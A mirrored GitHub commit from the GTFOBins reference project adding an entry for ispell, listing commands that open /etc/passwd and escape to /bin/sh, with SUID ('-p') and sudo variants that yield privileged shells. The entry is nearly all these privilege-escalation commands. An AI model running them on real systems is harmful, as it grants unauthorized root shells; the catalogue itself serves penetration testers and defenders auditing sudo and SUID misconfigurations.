1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00

Add ispell shell

Close #259
This commit is contained in:
Andrea Cardaci 2022-01-26 23:06:33 +01:00
parent 1ab481cbd0
commit 50ab4f0ce0

15
_gtfobins/ispell.md Normal file

@ -0,0 +1,15 @@
---
functions:
shell:
- code: |
ispell /etc/passwd
!/bin/sh
suid:
- code: |
./ispell /etc/passwd
!/bin/sh -p
sudo:
- code: |
sudo ispell /etc/passwd
!/bin/sh
---